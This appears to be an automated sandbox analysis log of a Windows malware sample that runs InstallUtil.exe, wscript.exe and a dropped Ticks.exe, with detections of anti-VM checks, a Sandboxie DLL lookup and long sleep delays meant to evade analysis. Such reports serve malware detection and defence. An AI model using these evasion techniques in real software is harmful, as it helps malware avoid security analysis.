Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 50201668.exe, 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\50201668.exe	Memory allocated: 1830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory allocated: 3240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 30F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory allocated: 14A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory allocated: 51D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 5270000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Window / User API: threadDelayed 6917	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Window / User API: threadDelayed 2913	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 868	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1615	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Window / User API: threadDelayed 1979	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Window / User API: threadDelayed 7832	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2730	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7388	Thread sleep count: 6917 > 30	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7388	Thread sleep count: 2913 > 30	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -99084s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98944s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98679s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98545s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98322s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98215s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -98104s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97788s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97569s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97429s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97273s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -97044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96934s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96700s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -96015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94877s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94353s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94212s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe TID: 7352	Thread sleep time: -94078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7760	Thread sleep count: 868 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99753s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99637s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7760	Thread sleep count: 1615 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99385s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -99123s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -98828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -98363s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -98249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7892	Thread sleep count: 1979 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7892	Thread sleep count: 7832 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99781s >= -30000s	Jump to behavior
